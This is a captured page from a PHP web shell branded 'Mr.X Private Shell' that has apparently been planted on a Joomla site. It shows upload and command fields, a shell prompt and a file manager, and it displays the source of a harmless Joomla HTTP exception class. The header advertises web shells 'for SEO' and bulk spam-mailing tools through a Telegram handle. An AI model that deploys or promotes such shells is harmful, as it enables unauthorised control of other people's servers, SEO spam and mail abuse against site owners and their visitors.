__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

/**
 * Part of the Joomla Framework Http Package
 *
 * @copyright  Copyright (C) 2005 - 2021 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE
 */

namespace Joomla\Http\Exception;

use Joomla\Http\Response;
use Psr\Http\Client\ClientExceptionInterface;

/**
 * Exception representing an unexpected response
 *
 * @since  1.2.0
 */
class UnexpectedResponseException extends \DomainException implements ClientExceptionInterface
{
    /**
     * The Response object.
     *
     * @var    Response
     * @since  1.2.0
     */
    private $response;

    /**
     * Constructor
     *
     * @param   Response     $response  The Response object.
     * @param   string       $message   The Exception message to throw.
     * @param   integer      $code      The Exception code.
     * @param   ?\Exception  $previous  The previous exception used for the exception chaining.
     *
     * @since   1.2.0
     */
    public function __construct(Response $response, $message = '', $code = 0, ?\Exception $previous = null)
    {
        parent::__construct($message, $code, $previous);

        $this->response = $response;
    }

    /**
     * Get the Response object.
     *
     * @return  Response
     *
     * @since   1.2.0
     */
    public function getResponse()
    {
        return $this->response;
    }
}

Filemanager

Name Type Size Permission Actions
InvalidResponseCodeException.php File 513 B 0664
UnexpectedResponseException.php File 1.36 KB 0664
Filemanager